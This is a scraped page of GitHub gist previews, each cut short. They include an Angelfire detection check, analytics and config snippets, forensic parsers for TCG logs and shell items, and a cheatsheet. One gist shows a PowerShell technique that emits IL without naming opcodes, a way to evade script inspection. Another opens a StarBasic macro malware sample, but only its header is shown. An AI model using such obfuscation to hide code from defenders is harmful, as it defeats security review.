Dan danzek

@dalmoz
dalmoz / CheckAngelfire.ps1
Last active September 3, 2017 08:33
A one-liner PowerShell script for testing if your station is infected by the CIA's Angelfire. Path known from: https://wikileaks.org/vault7/document/Angelfire-2_0-UserGuide/Angelfire-2_0-UserGuide.pdf
# Registry value taken from the Angelfire 2.0 user guide linked above; GetValue() returns $null when the value is absent, so the check falls through to "Nothing".
if ((Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows').GetValue('SystemLookup')) {Write-Host "Angelfire found!"} else {Write-Host "Nothing"}
@jquinter
jquinter / config.yml
Last active April 15, 2018 12:29
Parse YAML from bash with sed and awk.
development:
  adapter: mysql2
  encoding: utf8
  database: my_database
  username: root
  password:
  apt:
    - somepackage
    - anotherpackage
@aronwoost
aronwoost / gist:1000402
Created May 31, 2011 12:11
Exclude private ip addresses from google analytics tracking
(function(){
  // Skip tracking when the page is served from a loopback/RFC 1918 address or localhost
  // (matched against the hostname only, so a dev server reached by a DNS name is still tracked).
  var re = /(^127\.0\.0\.1)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^192\.168\.)|localhost/;
  if(re.test(window.location.hostname)) return;
  // ga.js reads the command queue from the global _gaq; declaring it with `var` inside this closure would hide it from ga.js.
  window._gaq=[['_setAccount','UA-23156659-1'],['_trackPageview'],['_trackPageLoadTime']];
  (function(d,t){var g=d.createElement(t),s=d.getElementsByTagName(t)[0];g.async=1;
    g.src=('https:'==location.protocol?'//ssl':'//www')+'.google-analytics.com/ga.js';
    s.parentNode.insertBefore(g,s)}(document,'script'));
})();
print_ts_la.py
#!/usr/bin/env python3
import os
from time import sleep

FILE_PATH = 'ts.txt'

def get_atime_1():
    # lstat-style call: report the access time of the path itself, not of a symlink target
    result = os.stat(FILE_PATH, follow_symlinks=False)
    return result.st_atime
CILStreamObfuscation.ps1
${🤷} = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32]))
${🤔} = ${🤷}.GetILGenerator()
# Each pair is (raw OpCodeValues number, internal flags word). The OpCode struct is built through its
# non-public constructor, so no opcode name (ldarg.0, ldarg.1, add, ret = 2, 3, 88, 42) appears in the script text.
@(@(2, 275120805),@(3, 275120805),@(88, -261739867),@(42, 23440101)) | % {
    ${🤔}.Emit([Activator]::CreateInstance([System.Reflection.Emit.OpCode], [Reflection.BindingFlags] 'NonPublic, Instance', $null, @(($_[0] -as [System.Reflection.Emit.OpCode].Assembly.GetType('System.Reflection.Emit.OpCodeValues')), $_[1]), $null))
}
# The emitted IL simply returns the sum of its two arguments.
${💩} = ${🤷}.CreateDelegate([Func``3[UInt32, UInt32, UInt32]])
${💩}.Invoke(2,3)
@JohnLaTwC
JohnLaTwC / star basic macro malware.txt
Created February 7, 2019 17:22
StarBasic macro Malware (Uploaded by @JohnLaTwC)
## Uploaded by @JohnLaTwC
25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe.unzip\Basic\Standard\Module1.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
Sub OnLoad
Dim os as string
@sf-jonstewart
sf-jonstewart / prelease201902-shell_items.py
Last active February 21, 2019 01:35
Stroz Friedberg developer Shane McCulley rewrote our Python scripts for parsing Windows shell items using Kaitai. We'll contribute the definitions to Kaitai as open source. shell_items.py shows how to construct a parser on top of the Kaitai-generated parsers. This is an unsupported pre-release. Feedback welcome!
import datetime
from typing import AnyStr, Generator, Optional, Tuple, Type, Union
import uuid
from kaitaistruct import BytesIO, KaitaiStream
import known_uuids
import logging
import ShellItemList
@mattifestation
mattifestation / SimpleTCGLogParser.ps1
Last active April 14, 2019 01:43
If you have the HgsDiagnostics PowerShell module, then you can parse TCG logs.
Import-Module HgsDiagnostics
# Locate the Microsoft.Windows.RemoteAttestation.Core assembly via the assembly that implements Get-HgsTrace
# (rather than by file path) and load it so its TcgEventLog parser type is available.
$GetHgsTrace = Get-Command Get-HgsTrace
$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName
# Windows keeps one measured-boot (TCG event) log per boot under MeasuredBoot; take the newest one.
$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName
$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)
$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
# Group the parsed events by the PCR they were extended into.
$ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex
@i80and
i80and / x8664-asm-cheetsheet.txt
Last active September 17, 2019 15:29
x86-64 asm cheatsheet
Registers
Caller-saved: RAX RCX RSP RDI RSI RDX R8 R9 R10 R11
Callee-saved: RBP RBX R12 R13 R14 R15
Args: RDI, RSI, RDX, RCX, R8, R9, XMM0–7
Return: RAX
Simple Compile
yasm -f macho64 foo.asm && gcc foo.c foo.o -Wall -Wextra -g -O1
@timsutton
timsutton / apfs_cli_tools.txt
Last active February 7, 2020 23:06
apfs tools in Sierra
➜ ~ sw_vers
ProductName: Mac OS X
ProductVersion: 10.12.1
BuildVersion: 16B2333a
➜ ~ ls -l /System/Library/Filesystems/apfs.fs/Contents/Resources
total 2088
-rwxr-xr-x 1 root wheel 349760 22 Sep 03:48 apfs.util
-rwxr-xr-x 1 root wheel 352880 22 Sep 03:48 apfs_invert